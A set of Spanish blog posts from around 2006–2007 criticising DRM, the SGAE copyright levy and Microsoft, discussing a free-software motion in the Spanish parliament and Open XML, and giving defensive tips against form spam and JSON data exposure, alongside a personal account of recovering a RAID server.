Pese a todo cada vez hay más compañías que se están lanzando y aceptando la distribución de música en formato MP3 sin DRM. Cada vez cala más en los usuarios que DRM es “Defective By Design“. Y si aún lo dudan, no hay más que ver el enorme fiasco de las protecciones de los nuevos discos Blu-Ray y HD-DVD, que han sido rotas por completo. El DRM tiene la batalla perdida. Y veremos como lo sobrelleva Microsoft con su Windows VISA, perdón, Vista, que tan fuertemente ha apostado por el DRM y limitar a los usuarios. La jugada le puede salir mal, y que el nuevo windows se convierta en un nuevo “Windows Millenium” ¿se acuerdan?.

La SGAE no cambia, sigue a lo suyo, negando la propia ley y diciendo que las descargas sin ánimo de lucro si son delito.

Dejando a un lado la música, hay cosas más importantes que se dirimen estos días en los juzgados, como las patentes sobre medicamentos. En la India se enfrenta la farmacéutica Novartis (10.100 millones de dólares de beneficio neto en 2006) al gobierno por impedirle patentar un medicamento contra la leucemia. La patente sobre un medicamento desarrollado hace 6 años, les permite poner en el mercado unos medicamentos en exclusiva al precio de unos 2.200 dolares/mes por paciente durante los 20 años que dura la patente (aunque según Novartis, en acto de caridad se ofrece gratuitamente al 99% de los pacientes de la india).

Ayer Sandra me dijo ¿Sabes que ha salido el Windows VISA?. Hehehe… cuanto menos divertida la asociación con las tarjetas por el dinero que mueve, pero efectivamente la actualización de windows está en boca de todos gracias a una enorme campaña publicitaria de lanzamiento y una no menos importante cobertura de los medios, que caen como moscas y dan una brutal y generalizada publicidad gratuita que ni siquiera Microsoft se podría permitir, llegando a todo el mundo, incluso a ciudadanos sin siquiera ordenador.

Sin embargo sorprende ver que la cobertura informativa en la prensa plantea ciertas dudas, como que “no convence", “faltan motivos para actualizarse” y que señalan su alto consumo de recursos. A pesar de todo, y de su alto precio, seguro que será una estrella en ventas, y los más contentos serán los fabricantes de hardware, que se van a forrar de actualizaciones y vendiendo equipos caros hasta a los hogares más normales, ya que si no no funcionará el windows.

Si les deja el nuevo Visa la boca abierta y con ganas de dejar la VISA temblando, no olviden buscar vídeos de Beryl/OSX en Youtube. Como este (es linux, no windows):

Los chicos de Google han espabilado, y parece que ya no van a ser tan fáciles los “google bombs”, que para quien no lo sepa consisten en lograr vincular alguna página con algún término que no le corresponde, normalmente con objetivos políticos o reivindicativos.

Algunos de los más famosos eran “miserable failure” que daba siempre como primer resultado en Google a la página de Bush en la casablanca, y más cercanos el lograr la verdadera definición de la SGAE, cuando salía como primer resultado al buscar “ladrones“. Ya no funciona ninguno de ellos (con lo acertados que me parecían ambos resultados…).

Por una parte entiendo que Google debe dar siempre los mejores resultados, y cuando busca algunos de esos términos no se esperan respuestas tan extrañas del buscador. Por otra parte también me da un poco de pena. Se quita peso y poder de opinión a la comunidad internauta. Si de verdad todo el mundo cree que la SGAE son unos ladrones, ¿no es verdad? ¿no es un resultado válido? Lo que ha llevado a Google a convertirse en el mejor buscador ha sido siempre su saber destilar la opinión de los internautas a través de enlaces para saber qué páginas son más o menos importantes y relevantes.

Esperemos que al menos estos algoritmos también contribuyan a evitar que algunas empresas logren puestos altos en búsquedas creando sus propias nubes de enlaces, que alguna vez cuando buscas información de productos no sales de las tres tiendas tienen infinitas páginas para artículos que ni venden.

Últimamente está habiendo un contínuo chorreo de noticias relacionadas con la SGAE y los derechos de autor. Supongo que con esto de las navidades hay que fomentar el consumismo, y es un buen momento para tratar de conseguir mayores beneficios.

Tras el “éxito” de la ridícula manifestación de la SGAE, y la indignante campaña de publicidad contra el pirateo financiada por el Ministerio de Cultura, llega el comunicado de ayer denunciando las “550 millones de descargas ilegales” que se producen al año en España.

El País ahora ha eliminado “ilegales” del titular, dejándolo en “descargas de música y películas", pero lo mantiene en el cuerpo de la noticia. Aún tenemos que recordar a la SGAE, que supuestamente está versada en leyes más que ninguno, que ¡LA COPIA PRIVADA SIN ANIMO DE LUCRO NO ES DELITO EN ESPAÑA!.

Lo más gracioso son las declaraciones de la SGAE:

“La Sociedad General de Autores asegura que estas prácticas destruyen puestos de trabajo y desalientan la creación” […] “la destrucción absoluta de la creación y de la cultura", que se manifestó, por ejemplo, mediante el cierre de empresas tales como la cadena de videoclubs Blockbuster o las tiendas de discos Madrid Rock.

Si, claramente el mercado audiovisual está en crisis. Ya casi no salen discos de música, ni películas… se nota un montón, sobre todo ahora en navidad. Madrid Rock como ejemplo, pase, aunque más bien el cierre fue motivado por el valor del local. En cuanto a Blockbuster no me parece que sea un “motor de creación de cultura". Es un simple distribuidor inadaptado, en un mundo donde los sistemas de distribución de la información van a cambiar, quieran o no. Como si SEUR ofreciera transporte de paquetería en burro a estas alturas.

En cambio de los puestos de trabajo que destruye el canon se olvidan hablar. Fotoprix denunciaba una caída de ventas de CDs de 5 a 1.4 millones con la llegada del canon. Y empresas españolas de fabricación de CDs tuvieron que cerrar.

Tampoco de los costes que tiene para usos completamente legales, como la grabación en CDs y DVDs de datos oficiales de juzgados, administraciones públicas, etc. El año pasado la SGAE facturó 25 millones de euros sólo del canon.

Entre 2004 y 2006 la Administración de Justicia catalana compró 309.800 CD (para expedientes originales y copias); en Canarias, 19.800 CD y 12.600 DVD a un coste total de 48.816 euros; en la Comunidad Valenciana fueron 95.221 CD y 607 DVD; en Galicia gastaron 65.000 euros para comprar unas 70.000 unidades; en Navarra, 20.000 CD y 6.000 DVD (17.700 euros) y en el País Vasco 80.0000 CD a 60.000 euros.

La Consejería de Justicia andaluza consumirá este año 111.210, lo que supone un gasto de 57.829 euros. La Comunidad de Madrid no suministró datos y Asturias tiene las competencias recién transferidas.

Es relativamente fácil calcular una cifra aproximada de la recaudación ilegal de la SGAE sobre esos discos, y lo pagamos, como no, entre todos.

En Europa sin embargo soplan otros aires, y pese que aún no se mueven las cosas se están replanteando el sentido que tienen estos impuestos privados, independientes de cada país, en un mercado único. Y aún el Tribunal de Defensa de la Competencia tiene que resolver si el acuerdo entre las entidades de gestión y los fabricantes incumplió la Ley de Competencia Desleal, al gravar todos los soportes digitales sin excepción. Queda mucha batalla, pero sabemos quienes la tienen perdida (los que hace mucho dejaron de tener modelo de negocio), pero venderán cara la derrota.

Al principio me había hecho gracia la portada de la revista Time para homenajear a los usuarios de internet por su influencia cada vez mayor en la sociedad de la información. Ha costado, pero al final Internet parece que ha logrado democratizar la capacidad de comunicar, antes sólo disponible para los grandes medios de comunicación: TV, Prensa y Radio. Ahora surgen miles de blogs, foros, sistemas de bookmarking social, periódicos por internet que se vuelven participativos, etc.

Hace 2 años era Bush, por “mantenerse en sus pistolas” el que copaba esa posición, mientras ahora son Hugo Chavez y Mahmoud Admadinejad (presidentes de Venezuela e Irán). A pesar de todo Bush sigue manteniendo una posición importante. Tiene mérito ser capaz de empeorar la situación y crear una catástrofe general y consistente en todo oriente medio.

Pero realmente es una estrategia “bonita” de cara a la galería para no elegir a una persona que sería non grata. Por Internet las encuestas daban a Hugo Chavez la victoria, seguido de cerca por Mahmoud. La propia revista admite que si hubiera decidido elegir a un individuo, probablemente habría sido el presidente iraní. Rinzewind propone una portada alternativa, resaltando lo curioso que resulta que Time de la razón a la comunidad internauta por el peso de su opinión y a la vez rechace su veredicto de persona del año.

Hoy toca hablar de asuntos de frikis de la informática:

¿Libre queeeee?

Hoy se presenta en el congreso una proposición no de ley para la promoción del Software Libre, pero que realmente esconde las tesis de los defensores del software propietario, los estándares cerrados y las patentes.

Menciona de pasada el software libre como fuente de desarrollo de software, sin mencionar el valor que crea para la sociedad, los puestos de trabajo que produce, la industria local que favorece… En cambio si que deja bien claro que la oferta debe considerar coste, funcionalidad, interoperabilidad… justo lo mismo que dice Initiative for Software Choice, una asociación financiada por las grandes del mundo del software propietario.

El punto 4 es especialmente críptico. Parece que aboga por el software propietario para aplicaciones destinadas al uso de la ciudadanía.

En el punto 5 se cita como una de las máximas “la conservación de las aplicaciones utilizadas", nada de cambiar los windows que ya tenemos, eh?

En el punto 7 se dice que se deben valorar alternativas Open Source. ¿Acaso no se hacía ya? ¿Había una norma contra esto? En cambio deja muy clara de nuevo que los criterios para la elección deben ser: coste, funcionalidad, seguridad e interoperabilidad, evitando recomendaciones o preferencias sólo en función del tipo de licencia de la solución. Impidiendo que las administraciones exijan Open Source si lo desean. Impidiendo que se exijan estándares abiertos (se valora la interoperabilidad, pero no se propone que se puedan exigir). Esto si que es copia literal de lo que propone ISC. No se incluye una valoración de la riqueza, libertad, flexibilidad e industria local que favorece el Software Libre. Curiosamente va en contra de la tendencia de la UE con numerosos programas e iniciativas destinadas a fomentar el uso de Software Libre.

En resumen, NADA. Ni explica cómo reconocer el Software Libre, ni detalla sus ventajas. Lo único que concede esta ley es la necesidad de impulsar estándares abiertos (ahí ya no queda duda) pero en cuanto al Software Libre sólo incluye que se deba considerar en los concursos, sin ningún tipo de fomento o impulso verdadero respecto a la situación actual.

Casualmente, el CNI tendrá acceso al código fuente de MS Office, MS regala software para seguimiento de pedrastas, y se lleva estupendamente con todos los gobiernos que se dejan camelar.

Nota: En itálica mis comentarios.
Proposición no de Ley, relativa a la “promoción” del software libre

La adhesión a estándares abiertos facilita que los diversos actores puedan participar en la sociedad de la información, utilizando sus opciones tecnológicas preferidas, sin verse condicionados a la utilización o adquisición de entornos tecnológicos concretos, a la vez que se facilita una mayor concurrencia en el mercado.
Existen algunos criterios políticos que deben impregnar las políticas públicas en materia de software:

Al buscar soluciones de software se debe hacer siempre en términos de racionalidad técnica y económica, valorando la oferta global y considerando coste, funcionalidad, interoperabilidad y seguridad, teniendo en cuenta los estándares abiertos y el software libre como fuente importante de desarrollo de software.

Como defensores de la libertad personal, de la libertad de opción de la ciudadanía, queremos que las personas puedan interactuar con la Administración sin condicionar a la ciudadanía a la utilización o, en su caso, adquisición de un software determinado para ejercer sus derechos.

Facilitar la interoperabilidad con los ciudadanos y entre las Administraciones Públicas, velando porque todos los ciudadanos tengan igualdad de oportunidades en el acceso a la información disponible por el medio electrónico, evitando situaciones de perjuicio por la insuficiente concurrencia en el mercado, así como facilitando la utilización de las distintas modalidades lingüísticas.

En el ámbito de la enseñanza y la formación, la Administración debe promover la educación en los estándares abiertos y en la independencia tecnológica. Así, se debe fomentar una formación orientada a la función, más que a la creación de meros usuarios de productos concretos sin mayor perspectiva o capacitación fuera de los mismos.

Para el desarrollo de la sociedad de la información es importante la existencia de múltiples proyectos empresariales y de creación de software, que generen oferta competitiva tanto en software propietario como libre.

El Congreso de los Diputados insta al Gobierno a profundizar, incidir y poner en marcha las siguientes políticas:

1. Actuar desde el principio general de generar libertad de opción y elección entre la ciudadanía.
2. El Gobierno aplicará los criterios de idoneidad, seguridad e interoperabilidad tecnológica en el momento de adquirir software, valorando la oferta global, según lo previsto en los marcos jurídicos relativos a la tramitación electrónica del procedimiento administrativo y a la contratación pública y, en cualquier caso, de racionalidad técnica y económica, con el nivel de
   madurez y coherencia adecuado al previsible impacto con el respeto al marco comunitario establecido para la contratación.
3. Fomentar y garantizar el impulso y adopción de estándares abiertos desde la Administración del Estado.
4. Establecer políticas que favorezcan la industria y el desarrollo de software libre y de código abierto en España, que fomenten la adopción y la creación de estándares abiertos de software, y que promuevan la generación de soluciones que sólo existen bajo la forma de software propietario en el caso de aplicaciones destinadas al uso de la ciudadanía.
5. Promover la ejecución en toda la Administración General del Estado de lo previsto en los “criterios de seguridad, normalización y conservación de las aplicaciones utilizadas para el ejercicio de potestades” y en la “propuesta de recomendaciones a la Administración General del Estado sobre software libre y de fuentes abiertas” de mayo de 2005.
6. En concreto, promover el impulso de lo previsto en la mencionada propuesta, para mejorar la racionalidad técnica y económica en las compras públicas.
7. Introducir el criterio de que en todo concurso público o compra de aplicaciones o desarrollos a medida por parte de la Administración Pública se deben evaluar tanto las soluciones de software libre como las de software propietario, en caso de existir, bajo los criterios de coste, funcionalidad, seguridad e interoperabilidad, evitando recomendaciones o preferencias sólo en función del tipo de licencia de la solución.
8. Desarrollar y distribuir en las diferentes lenguas del Estado los programas y aplicaciones de la Administración del Estado destinadas a la ciudadanía o compartidas con las Comunidades Autónomas. Igualmente, promover la existencia de aplicaciones en las diversas lenguas del Estado.
9. Basar los planes de formación de toda la Administración del Estado, tanto los dirigidos a su personal como a la ciudadanía, en fomentar una formación orientada a la función, más que a la creación, de meros usuarios de productos concretos.»

Open XML

Relacionado con el punto anterior, ha sido enorme el revuelo y críticas en el mundo de la informática por la aprobación como estándar ECMA, en tiempo récord y sin cambios del formato Open XML de Microsoft, un puro de 6000 páginas, plagado de fallos, poco interoperable y lleno de cosas raras y excepciones para mantener compatibilidad con versiones anteriores de word. Un formato especificado de forma abierta, sí, pero en la práctica imposible de implementar y de ser realmente interoperable.

Sun ha publicado como respuesta un listado de requisitos que debe cumplir un estándar abierto para que realmente sea considerado como tal. La ODF Alliance también ha publicado otro documento señalando los fallos y problemas que exiten en el formato Open XML de MS:

• Que se trata de un estándar que únicamente busca compatibilidad con la suite de MS como último fin, sin acomodar la funcionalidad necesaria para otros posibles fines, sin buscar la mejor manera de representar datos, sin asegurar su interoperabilidad.
• Procedimientos de aprobación rápidos para una especificación de 6000 páginas ponen en duda el grado de análisis que ha empleado ECMA para aprobar Open XML.
• Reinventa estándares existentes. No usa por ejemplo SVG, MatML o HTML como base, sino que crea alternativas nuevas, no probadas.
• Incluye formatos binarios en ciertas partes, incluye bugs y errores sin pretender arreglarlos, sino que todas las implementaciones se comporten igual de mal.
• Se ha aprobado ya otro estándar para documentos, ODF, utilizando la misma tecnología (xml + zip) por lo que no tiene mucho sentido que un cuerpo oficial impulse dos estándares para el mismo fin al mismo tiempo. Eso sólo provoca que haya competencia y problemas de interoperabilidad, que es justo lo contrario que busca un estándar abierto.

Google

Supongo que a nadie se le ha pasado el logo de Google para hoy (¿Alguien pasa un día entero sin usar Google?). Genial adaptación del famoso cuadro de Edward Munch “El Grito” por el aniversario del pintor. Es especialmente feliz el recuerdo del cuadro que fue recuperado recientemente tras su robo, del que ya hablé por este blog.

Mapa de IPv4

Los rangos de direcciones IPv4 se están acabando, la mayoría está asignado ya. El dibujante de viñetas xkcd ha encontrado una manera de dibujarlas en un cuadrado que agrupa bastante bien las asignaciones. Sirve también para comparar el volumen ocupado por EEUU y sus empresas y Europa frente al resto del mundo, aunque a lo mejor esto queda mejor reflejado en este otro mapa de IPs per cápita.

El jucio de SCO contra IBM sus contribuciones a linux se le ha torcido definitivamente a SCO, cuando la juez ha desestimado seguir esperando a más pruebas que nunca llegan y ha rechazado buena parte de los argumentos de SCO:

Having thoroughly reviewed and considered the briefing related to IBM’s Motion to Limit SCO’s Claims, the briefing related to SCO’s objections, the underlying previous discovery orders, and the arguments made at the October 24 hearing, the court finds that, even under a de novo standard of review, the Magistrate Judge’s June 28, 2006 Order is correct. The court finds that SCO failed to comply with the court’s previous discovery-related Orders and Rule 26(e), that SCO acted willfully, that SCO’s conduct has resulted in prejudice to IBM, and that this result–the inability of SCO to use the evidence at issue to prove its claims– should come as no surprise to SCO. In addition, the court finds that neither particularized findings on an item-by- item basis nor an evidentiary hearing is required to make these determinations. The court, therefore, affirms and adopts the Magistrate Judge’s June 28, 2006 Order in its entirety.
[…]
“In the view of the court it is almost like SCO sought to hide its case until the ninth inning in hopes of gaining an unfair advantage despite being repeatedly told to put ‘all evidence . . . on the table’”

Ahora queda la parte más divertida:

Véanlo ustedes mismos:

Y viendo el histórico de 5 años, se ve claramente a que jugaban los directivos de SCO con la demanda. Seguro que ellos ya vendieron el grueso de sus acciones tras la demanda, cuando las acciones rozaban los 25$:

Esa frase mítica la dijo Bill Gates en 2003, y va camino de convertirse en un error tan famoso como sufrase “640K (de RAM) deberían ser suficientes para todo el mundo” que dijo en 1981.

Aquí os presento una gráfica del correo basura o SPAM que recibo cada mes desde 2003 a 2006, para una de mis cuentas (la de la asociación Eurielec). En GIO recibía bastante más spam por estar en muchos alias, pero no dispongo de cifras estadísticas.

Podemos ver que el problema del spam, lejos de desaparecer, sigue creciendo. Salvo en el periodo julio-diciembre de 2005 donde se aprecia una sustanciosa reducción (probablemente por campañas legales contra spamers) el resto del tiempo sigue aumentando.

Podría decirse que el problema está resuelto para aquellos que tienen filtros antispam, como matizó más tarde Bill. Desde luego su apuesta por el “Sender ID” como técnica para luchar contra el spam ha sido un fiasco, y Hotmail es uno de los proveedores de correo al que más SPAM se le cuela. A pesar de todo, los filtros anti-spam que aprenden analizando patrones de texto del correo tienen un grado de éxito razonable. Yo uso bogofilter, con unos resultados muy aceptables. La gran mayoría de los emails que aparecen en las gráficas han sido detectados y filtrados automáticamente.

En problema es que sin embargo últimamente el spam está llegando a unas cotas de tecnología enormes:

• Utilizan exploits “0-day” para extender troyanos y controlar masivas redes de ordenadores para el envío de correos.
• Siguiendo patrones de envío cada vez más parecidos a los correos legítimos, alternando IPs, froms, contenidos, sin provocar exceso de un tipo.
• Utilizando SPF y otras tecnologías anti-spam a su favor, dando de alta dominios para envíos y dejándolos de usar en menos de 24h, demasiado rápido como para que se puedan filtrar.
• Mandando mensajes con imágenes que van cambiando (diferentes hash), ascii art, etc.
• No incluyendo enlaces. Por ejemplo ganando dinero provocando compras de acciones…
• Incluyendo textos en los emails relacionados con la temática con la que pareces relacionado. A mi me incluyen trozos de manuales sobre CSS, diseño web, programación, que no puedo clasificar como SPAM por miedo a que mis filtros aprendan mal y empiecen a filtrar correo legítimo que me interesa.

Con tanta especialización de los spammers está claro que cada vez va a ser más difícil luchar contra el spam de forma aislada, individual. Sistemas como Akismet funcionan bastante bien para blogs, y proveedores de correo como Gmail, con gran cantidad de usuarios, tienen una calidad de filtrado muy alto gracias a que pueden comparar lo que reciben muchísimos usuarios y detectar enormes cantidades de emails similares. Conozco a gente que se envía todo su correo a gmail sólo para que le filtre el correo no deseado.

En fin, está claro que el problema tiene poca solución. Esperemos que poco a poco la extensión del uso de filtros anti-spam vaya reduciendo el margen de éxitos de los spamers, y deje de ser un mercado rentable. Mientras genere beneficios, está claro que tendremos spam para rato.

Seguimos con las recetas de seguridad:

Siempre que tengas un formulario para enviar emails:

• No permitas definir el “to:” Los spamers usarán tu formulario (y tu servidor) para enviar publicidad a su lista de emails.
• No permitas n r o similares en ninguno de los campos subject, from,
  to…: Pueden usarlos para inyectar campos Bcc/CC con los que añadir destinatarios para los emails, y lograr así enviar correo a través de tu servidor.
• No uses nombres obvios que busquen los spamers: Buscan campos de formularios que se llamen email, recipient, etc…
• Si detectas Bcc: en alguno de los campos, tira el mensaje a la basura: Es un intento de envío de correo no solicitado.
• Usa capchas: Bastante efectivo, aunque algo tedioso de programar y los spammers pueden llegar a contrata a gente de países pobres que les reconozca capchas.

Si es un formulario que mete datos en DB:

• No uses nombres obvios que busquen los spamers: Buscan campos de formularios que se llamen title, subject, body, post_title, etc…
• Usa capchas.
• licas enlaces, añade siempre el rel="nofollow” al tag del enlace: Esto hace que los links no cuenten para google, y por lo tanto deja de interesar tanto a los spammers.
• Limita el número de links: Si tiene más de un número razonable, suele ser SPAM.
• Limita los USER_AGENT: Algunas páginas, como los trackback de los blogs no tiene sentido que sean accedidas por navegadores normales. Las peticiones las suelen realizar scripts de blogs con user agents raros, no explorer ni firefox. Bloquear estos navegadores en esas páginas suele ser una buena idea.
• Sistemas de filtrado: Existen sistemas que analizan la probabilidad de que una entrada sea SPAM, basándose en su contenido, repeticiones… Por ejemplo Akismet es un servicio especializado en filtrar para blogs, y al recibir los comentarios de infinidad de ellos puede detectar rápidamente nuevos spam en cuanto se empiezan a detectar muchos iguales.

Además yo uso un truco tremendamente efectivo:

Suelo incluir unos campos:
<input type="text" name="email" ...
<input type="text” name="title” …

Los metes en un div con display:none, para que los usuarios legítimos no lo vean y no lo rellenen. Los spammers meterán datos en esos campos sin dudarlo y sin darse cuenta del display:none. En cuanto recibas $_POST[’email’] y/o $_POST[’title’] puedes bloquear la petición directamente, sin analizar nada más.

Si puedes, bloquea también la IP por unos minutos (necesitas un firewall que lo permita, o una serie de scripts para gestionar bloqueos temporales), que si no tendrás al spamer entusiasmado venga a hacer peticiones creyendo que funcionan, y chupando demasiado ancho de banda de entrada (al menos este canal suele ser el menos saturado).

AJAX es cool, JSON mola, Web 2.0 y 3.0 son lo más… ¡¡¡Pero volvemos a lo de siempre, ojito con la seguridad!!!

Normalmente si desde una página cargas otra (de un dominio diferente) en un frame, y tratas de acceder a su contenido, el navegador no te dejará por motivos de seguridad. Por ejemplo si en esta página pongo un iframe con www.gmail.com, se cargará tu cuenta de correo, pero desde código javascript de mi máquina no puedo acceder al contenido del frame y leer tu correo.

Sin embargo sí que se puede acceder a las variables y/o funciones javascript incluidas en un <script src="…", aunque la url que utilices sea remota, perteneciente a un servidor remoto.

Si en nuestro servidor incluimos datos sensibles, información privada de usuarios como código javascript, desde páginas remotas se podrá invocar el script, y si tienen la sesión iniciada es posible robar datos.

Eso solo pasa cuando se utiliza JSON (se devuelve código javascript en respuesta a peticiones AJAX). Es mas rápido que devolver XML (el formato original de AJAX) y que nuestro javascript tenga que procesarlo, pero puede traer problemas como el de inclusiones remotas. Este problema le ha pasado nada menos que a Google, experto en web 2.0, AJAX y demás, con lo que no quiero ni pensar lo que podría hacer esto en manos de webmasters poco hábiles.

Ya sabes, si utilizas JSON para máxima velocidad a la hora de responder peticiones AJAX, debes revisar bien su seguridad:

• No incluyas datos sensibles sacados de sesión en respuestas JSON (sólo respuestas a los parámetros dados).
• Si necesitas hacerlo, incluye unos tags HTML o basura antes y después, para que no pueda ser invocado como código javascript (de error al incluirlo).
• Haz que la URL no sea fácilmente predecible.
• Comprueba que el referrer es tu propia página y no ninguna externa

Desde el viernes lleva apagado el servidor del club Eurielec, donde tengo alojado este blog. Ese día apagaron a lo bestia el servidor, y al arrancar el RAID daba problema, no se reconocía un disco y no arrancaba. Yo no estaba ya en la escuela así que montamos una graciosa cadena de intrucciones. Yo por teléfono con Chesko, éste por mensajería instantánea con Golfo, y éste leyendo las órdenes en voz alta para que alguien las ejecutara en el servidor. Cuando creíamos que todo debería funcionar, una vez recompuestos los arrays RAID y tal, el reinicio final no funcionó. No era capaz de detectar las particiones, así que hubo que dejarlo (arreglar eso por teléfono es ya poco menos que difícil y arriesgado).

El sábado intenté ir a arreglarlo, arrancando con un CD de instalación de ubuntu, recomponiendo los raid, etc. Pero tras perder allí unas cuantas horas, y varios “portelgeist” (uno de los discos duros perdía la tabla de particiones al reiniciar), no logré que funcionara y tenía citas familiares.

El lunes tras varios intentos ya no se perdían las tablas de particiones, pero no estaba instalado el grub para arrancar y el script grub-install no funcionaba (tras montar los raid con el cd de instalación, hacer un chroot al raiz del servidor, etc). Decidimos ir a lo importante, salvar los datos, y puse a copiar por red (tar + netcat para máxima velocidad) los 180 gigas de datos del servidor. Tardó todo el puñetero día, y por la tarde sólo pude hacer alguna prueba más antes de irme, ya tarde.

Finalmente, por fin, esta mañana he logrado instalar el grub en el sector de arranque de ambos discos, desde la propia consola de root, y el servidor vuelve a funcionar. :)

Menos mal que ya tenemos pensado comprar y montar un ordenador reemplazo para los dos servidores actuales “cero” -el que murió esta vez- (Pentium II, 192 de ram, 2HD 200Gb en RAID que a duras penas daba para la web + bases de datos + cuentas.) y “uno” (Un simple Pentium con el correo, que moría con el mailman y los filtros antispam).

Con ese título a lo mejor consigo que este comentario parezca moderno durante unos meses. Ya empieza a correr la tinta sobre la web 3.0 cuando aún nadie tiene claro nada de web 2.0, salvo que es una cosa que huele a pasta. Ya se ha olvidado el batacazo de las “punto com", y todo lo que tiene punto mueve dinero. A partir de ahora me llamo Guillermo<punto>Pérez, y veréis como triunfo.

Digo 16.0 porque ayer (que se me pasó) fue el decimosexto cumpleaños de la World Wide Web, y por mucho buzzword que la quieran añadir, todo lo que está saliendo ahora como revolucionario, web semántica incluida, ya estaba en la idea inicial de Tim Berners-Lee.

Ya de paso también ayer se anunciaban nuevos “palabros", anglicismos algunos bastante cuestionables, que se van a añadir al diccionario de la lengua española, entre ellos “internet” (¿¡¿¡¿¡con minúscula?!?!?), “digitalización", “salvapantalla". Por lo general añadidos bastante sanos (aunque eso de bungaló…) y se rechazan extrajerismos con equivalente. Aún me acuerdo de cuando se extendió el uso de “emilio” para referirse al correo electrónico… qué dolor…

En efecto, ya tenemos nueva versión de Ubuntu, la flamante Edgy.

La llevo usando tiempo en el curro sin problemas, es muy rápida gracias al último gnome, tiene todas las aplicaciones frecuentes muy actualizadas (firefox 2, evolution 2.8…), me encanta el sistema de arranque “upstart” que elimina el arcaico init y tiene soporte de XGL para hacer pijadas varias 3D en el escritorio.

La versión servidor tiene una pre-release del Linux Terminal Server Project 5, para montar redes de terminales más o menos tontos, con soporte de USB e impresoras de los puestos locales.

Ahora mismo está corriendo el dist-upgrade en mi portátil :)))

Firefox 2 y Explorer 7 ya están en la calle.

Para los desarrolladores web esto supone nuevos cambios a los que adaptarse. En mi caso, sin máquinas con windows cerca es un gran problema (normalmente hago vnc a un windoze del curro), pero las diferencias de comportamiento IE5-IE6-IE7 también harán muy difícil al resto del mundo. Sólo se puede tener uno de esos navegadores en cada windows, y imagínense utilizando 3 máquinas para probar todas sus webs.

A pesar de todo, si se consigue un rápido abandono de IE6 y anteriores puede que la vida del desarrollador web mejore mucho. Por fin podremos tener un comportamiento de Explorer más o menos respetuoso con los estándares y un solo estilo CSS para todos, y mandar a explorer anteriores a la porra.

Para los usuarios de anteriores explorer el cambio será claramente a mejor. Sin embargo el resto las cosas no están tan claras. Es interesante leer la opinión de un usuario de Firefox.

Yo, personalmente, odio la interfaz de explorer:

Efectivamente gana algo de espacio eliminando la barra de menús, pero ponerla quitando hueco a las pestañas es un error. Firefox tiene una maravillosa extensión (Tiny Menu) que permite recolocar el menú como desplegable, lo que me parece una solución mucho mejor:

Y aún no está disponible para firefox 2, pero la extensión Tab Mix Plus también permite ocultar los botones de cerrar de las pestañas no activas, y que aparezcan sólo al poner el puntero sobre ellas. En resumen, una forma mucho más cómoda de navegar.

En definitiva, informaos sobre otras características de firefox 2 sus miles de posibilidades de ampliación y ¡¡¡considerad seriamente este navegador libre como alternativa!!!

El grupo de presión Initiative for Software Choice (ISC) defiende los intereses de los pobres fabricantes de software comercial, con sus ráquíticos márgenes comerciales del 85%, sus beneficios de apenas miles de millones de dólares. Está patrocinado por (¡sorpresa!) Microsoft y esta semana ha enviado una carta a la Comisión Europea para evitar que se impulse en Europa la adopción de Software Libre en la administración.

La carta en cuestión se ha filtrado y hay múltiples artículos que comentan la noticia. Quizás el más interesante sea este análisis de Linux Journal, que desgrana los argumentos más falaces y manipuladores del documento.

Curioso nombre, Initiative for Software Choice, para defender el software comercial, la propiedad intelectual, y que quiera disfrazarse de lucha por la “libertad elección". Lo difícil es librarse de sus ataduras, de sus formatos propietarias y elegir Software Libre por el bien de la sociedad.

Cada vez hay más indicios de que Microsoft estaba apoyando económicamente a SCO y su pleito contra IBM para perjudicar a Linux, una táctica de dudosa ética.

Pero eso no es nada, de toda la vida Microsoft ha utilizado su monopolio y ha empleado prácticas ilegales para extender su dominio y machacar a la competencia. Lo que más me preocupa es que sus tentáculos pulposos llegue a los gobiernos y logre que, con dinero público, se dediquen a co-financiar publicidad de Microsoft. Camuflándose como un plan conjunto para incrementar la “productividad", se van a destinar en cataluña 3 millones de euros (de los cuales MS sólo pone 1) en promocionar soluciones de Microsoft (como si esa empresa no tuviera fondos de sobra para financiar solita esas campañas).

Teddy Bautista ha hecho unas declaraciones que debería incluirlas en la categoría de “humor":

“los CD vírgenes no llevan un canon sino una remuneración compensatoria que en ningún caso paga el cliente que los compra, sino el que los fabrica o el que los importa”

Según esa regla, tampoco pagamos nunca el IVA… no señores, lo paga el que nos vende el producto que compramos, en ningún caso el cliente. Una cosa es a quién se recaude el canon y otra quien lo paga. Está claro que cualquier impuesto o tasa que se aplique a un producto acaba repercutiendo en el cliente.

Todo esto viene a raíz de las nada menos que 600.000 firmas contra el canon presentadas ante la Comisión Europea. No se conseguirá mucho, se denegará la petición de impugnar la nueva Ley de Propiedad Intelectual, ya que la comisión tiene una la larga lista de colaboraciones con la industria (de hecho es una fiel defensora de las patentes europeas, que podrían ser tan perniciosas para el desarrollo de la informática).

Toda la industria informática asiste con una sonrisa dibujada en los labios al desesperado intento de Microsoft de solucionar un problema descubierto en su DRM. Un programa llamado FairUse4WM lograba eliminar la protección DRM de los ficheros WM video/audio. ¿El ojetivo? permitir a los usuarios utilizar los contenidos por los que ha pagado en cualquier dispositivo, no sólo los que determine MS. Además, por supuesto, está el uso ilegal, como liberar contenidos alquilados sólo por un espacio de tiempo, distribuir contenidos ya desprotegidos, etc…

Normalmente MS saca los parches de seguridad de forma conjunta el primer martes de cada mes, independientemente de lo peligroso del fallo, aunque tengas tu culito al aire durante un mes entero. ¿Cuánto ha tardado en parchear el fallo del DRM? 3 días… Y no es un fallo gordo, que perjudique a los usuarios (los beneficia realmente). Se puede observar claramente qué es lo que importa realmente a MS. La seguridad por mucho que nos diga no es lo primero, la pela sí. Y es que ese agujerito en el DRM puede hacer peligrar muchos acuerdos con la industria discográfica, y los ingresos derivados.

Recuérdalo cuando te digan que te tienes que actualizar a Windows Vista para que estés más seguro. Mentira, sólo quieren tu dinero y capar tu ordenador con bien de DRM para controlar que cosas puedes y no puedes hacer con los contenidos que compras. Es como si la enciclopedia viniera con un hombrecito que te diera capones si intentas copiar un párrafo en un trabajo, hostias bien dadas si se te ocurre tratar de fotocopiarlo, e impidiera abrir el libro si se lo prestas a un vecino. Eso no es “buen uso", quieren que tu vecino también pague.

Lo mejor de todo es que menos de 3 días han tardado los de FairUse4WM en sacar una nueva versión que se salta el parche. Y MS volverá a intentarlo, no tengan duda, sin esperar ni loco al próximo martes. Como dice Wired News (artículo que recomiendo leer):

That was Saturday. Any guess on how long it will take Microsoft to patch Media Player once again? And then how long before the FairUse4WM people update their own software?

Certainly much less time than it will take Microsoft and the recording industry to realize they’re playing a losing game, and that trying to make digital files uncopyable is like trying to make water not wet.

